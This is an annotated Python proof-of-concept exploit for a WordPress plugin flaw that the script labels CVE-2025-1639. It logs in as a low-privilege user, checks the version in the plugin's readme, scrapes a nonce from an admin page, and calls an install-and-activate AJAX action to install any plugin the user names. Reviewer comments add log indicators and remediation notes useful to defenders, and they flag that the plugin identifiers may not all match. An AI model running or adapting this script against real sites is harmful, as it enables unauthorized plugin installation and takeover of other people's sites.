"""Proof-of-concept client that its own CLI description labels CVE-2025-1639.

What the code does, in order: authenticate to WordPress with supplied
credentials, fingerprint a plugin readme for ``Stable tag: 1.6.0``, read a
``security`` token out of an admin page, then POST a plugin slug to
``admin-ajax.php``.

Defender notes:
* The whole flow needs a valid WordPress account, so open registration and
  weak or reused low-privilege credentials are the precondition.
* Request sequence visible in access logs: POST /wp-login.php, GET of the
  plugin's readme.txt, GET /wp-admin/edit.php?post_type=pafe, then POST
  /wp-admin/admin-ajax.php carrying the ``action`` value used below.
* An unexpected plugin appearing as installed/active is the outcome to
  audit for; remediation is a vendor-fixed plugin release.

NOTE(review): the readme path, the ``pafe`` post type and the
``vayu_blocks_*`` action name are reproduced from the page as-is. Whether
they all belong to the same plugin is not verifiable from this page, so
confirm against the vendor advisory before building signatures on them.
"""
import argparse
import re

import requests
from bs4 import BeautifulSoup

# Exploit By Nxploit Khaled ALenazi


def login(session, url, username, password, user_agent):
    """Submit the WordPress login form and report whether a session was set.

    Success is judged only by the presence of a cookie whose name contains
    ``wordpress_logged_in`` in the session's cookie jar.

    Returns:
        True if such a cookie exists after the POST, otherwise False.
    """
    form_fields = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In',
    }
    # verify=False: the credentials are sent without validating the server
    # certificate, so an on-path party could capture them.
    session.post(
        url + '/wp-login.php',
        verify=False,
        data=form_fields,
        headers={"User-Agent": user_agent},
    )

    has_auth_cookie = False
    for jar_entry in session.cookies:
        if 'wordpress_logged_in' in jar_entry.name:
            has_auth_cookie = True
            break

    if not has_auth_cookie:
        print("Failed to log in.")
        return False
    print("Logged in successfully.")
    return True


def check_version(session, url):
    """Fingerprint the plugin by looking for a version marker in its readme.

    The check is a plain substring match for ``Stable tag: 1.6.0`` in the
    body of the plugin's ``readme.txt``. A readme that is publicly readable
    therefore discloses the installed version; any other version string,
    older or newer, is reported as "not vulnerable" by this script.

    Returns:
        True when the marker is present, otherwise False.
    """
    readme = session.get(
        url + '/wp-content/plugins/pro-addons-for-elementor/readme.txt',
        verify=False,
    )
    marker_found = 'Stable tag: 1.6.0' in readme.text
    if marker_found:
        print("The site is vulnerable... Exploiting and uploading the plugin.")
    else:
        print("The site is not vulnerable.")
    return marker_found


def extract_security_token(session, url):
    """Pull the ``security`` value from an inline script on an admin page.

    The page is fetched with the logged-in session; the first ``<script>``
    whose text matches ``theme_data`` is searched for ``"security":"..."``.

    NOTE(review): this is presumably a WordPress nonce. A nonce only shows
    the request originated from a page rendered for this session; it is not
    an authorization check, so a handler that validates the nonce alone does
    not restrict the action to administrators.

    Returns:
        The alphanumeric token string, or None if no script or no token
        was found.
    """
    admin_page = session.get(url + '/wp-admin/edit.php?post_type=pafe', verify=False)
    parsed = BeautifulSoup(admin_page.text, 'html.parser')
    inline_script = parsed.find('script', text=re.compile('theme_data'))
    if not inline_script:
        return None

    token_match = re.search(r'"security":"([a-zA-Z0-9]+)"', inline_script.string)
    return token_match.group(1) if token_match else None


def exploit(session, url, security_token, plugin_slug, user_agent):
    """POST the install-and-activate AJAX action with the extracted token.

    The request mimics a browser XHR issued from the admin page (Referer,
    Origin, X-Requested-With) and replays the session cookies explicitly.

    The printed result is based on the HTTP status code only. A 200 from
    ``admin-ajax.php`` does not by itself establish that anything was
    installed; the site's installed-plugin list is the authoritative record.
    """
    cookie_header = "; ".join(
        jar_entry.name + "=" + jar_entry.value for jar_entry in session.cookies
    )
    form_fields = {
        'action': 'vayu_blocks_install_and_activate_callback',
        'plugin_slug': plugin_slug,
        'security': security_token,
    }
    request_headers = {
        "User-Agent": user_agent,
        "Accept": "text/html, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": url + "/wp-admin/edit.php?post_type=pafe",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": url,
        "Connection": "keep-alive",
        "Cookie": cookie_header,
    }

    reply = session.post(
        url + '/wp-admin/admin-ajax.php',
        data=form_fields,
        headers=request_headers,
        verify=False,
    )
    outcome = (
        "Plugin uploaded and activated successfully."
        if reply.status_code == 200
        else "Failed to upload and activate the plugin."
    )
    print(outcome)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2025-1639 # By Nxploit | Kaled ALenazi ')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-un', '--username', required=True, help='WordPress username')
    # The password is taken from argv, so it lands in shell history and is
    # visible in the process list while the script runs.
    parser.add_argument('-p', '--password', required=True, help='WordPress password')
    parser.add_argument('-pl', '--plugin', default='wp-maintenance-mode', help='Plugin slug to upload and activate (default: wp-maintenance-mode)')
    args = parser.parse_args()

    user_agent = 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0'
    session = requests.Session()

    # Each stage gates the next: login, then version fingerprint, then token.
    if login(session, args.url, args.username, args.password, user_agent) and check_version(session, args.url):
        token = extract_security_token(session, args.url)
        if not token:
            print("Failed to extract security token.")
        else:
            exploit(session, args.url, token, args.plugin, user_agent)